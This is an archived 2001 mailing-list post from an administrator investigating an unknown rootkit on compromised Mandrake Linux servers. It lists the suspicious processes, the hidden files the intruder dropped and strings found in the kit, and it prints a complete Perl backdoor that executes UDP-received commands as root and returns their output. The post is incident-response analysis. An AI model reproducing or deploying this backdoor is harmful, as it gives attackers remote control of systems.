Security Incidents mailing list archives
New rootkit?
From: UIA Security <securityman () uia net>
Date: Wed, 12 Dec 2001 09:17:19 -0800
Hi folks,

Had 2 compromised boxes this morning running Mandrake Linux. Curiously, I can't find info on this rootkit anywhere. Anyone know it?
lsof -i:

.r00tsnif 11863 root 1u IPv4 682146 TCP x.com:ssh->a:3510 (CLOSE)
.r00tsnif 11863 root 2u IPv4 682146 TCP x.com:ssh->a:3510 (CLOSE)
.r00tsnif 11863 root 4u IPv4 682146 TCP x.com:ssh->a:3510 (CLOSE)
.r00tshoc 11865 root 0u IPv4 682146 TCP x.com:ssh->a:3510 (CLOSE)
.r00tshoc 11865 root 2u IPv4 682146 TCP x.com:ssh->a:3510 (CLOSE)
.r00tshoc 11865 root 3u IPv4 682409 UDP *:4816
.r00tshoc 11865 root 4u IPv4 682146 TCP x:ssh->a:3510 (CLOSE)
.r00tpass 11866 root 1u IPv4 682146 TCP x:ssh->209.158.182.186:3510 (CLOSE)
.r00tpass 11866 root 2u IPv4 682146 TCP x:ssh->a:3510 (CLOSE)
.r00tpass 11866 root 3u IPv4 682407 TCP *:9658 (LISTEN)
.r00tpass 11866 root 4u IPv4 682146 TCP x:ssh->a:3510 (CLOSE)
.r00t 11869 root 3u IPv4 682413 TCP *:65535 (LISTEN)
.r00t 11869 root 4u IPv4 682146 TCP x:ssh->a:3510 (CLOSE)
.r00t 11872 root 3u IPv4 682418 TCP *:31221 (LISTEN)
.r00t 11872 root 4u IPv4 682146 TCP x:ssh->a:3510 (CLOSE)
.r00tspin 11874 root 0u IPv4 682146 TCP x:ssh->a:3510 (CLOSE)
.r00tspin 11874 root 2u IPv4 682146 TCP x:ssh->a:3510 (CLOSE)
.r00tspin 11874 root 4u IPv4 682146 TCP x:ssh->a:3510 (CLOSE)

New files:

/usr/lib/.r00t
/usr/lib/.r00t/.r00tshocky
/usr/lib/.r00t/.r00tpasswd
/usr/lib/.r00t/.r00t
/usr/man/man2/.r00tm0e

Some interesting strings:

Welcome to shocker AnD VorTexTK
You are now r00t. Have phun..

/usr/lib/.r00t/.r00tshocky was a perl script to listen for messages on UDP:

    #!/usr/bin/perl
    use IO::Socket;
    use POSIX;

    # Daemonise: fork, let the parent exit, detach the child from its session.
    $pid = fork;
    exit if $pid;
    die("Error.") unless defined($pid);
    POSIX::setsid();

    $time_to_die = 0;
    sub signal_handler { $time_to_die = 1; }
    $SIG{INT} = $SIG{TERM} = $SIG{HUP} = \&signal_handler;

    until ($time_to_die) {
        $| = 1;
        $port   = 4816;    # the UDP *:4816 socket seen in the lsof output above
        $maxlen = 1024;
        my ($sock, $raddr, $rhost);
        # "Merge deja" is Romanian for "already running"
        $sock = IO::Socket::INET->new(LocalPort => $port, Proto => 'udp')
            or die("Error.Merge deja\n");
        # Each datagram received is executed through the shell (as root, since
        # the daemon runs as root) and its output is sent back to the sender,
        # followed by the "-end." marker.
        while ($sock->recv($msg, $maxlen)) {
            print $msg;
            my ($rport, $ipaddr) = sockaddr_in($sock->peername);
            $rhost = gethostbyaddr($ipaddr, AF_INET);
            $output = `$msg`;
            $sock->send($output);
            $sock->send("-end.");
        }
    }

...and of course a host of infected binaries. Any thoughts?

--Liam

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- New rootkit? UIA Security (Dec 12)
- Re: New rootkit? Blake Frantz (Dec 13)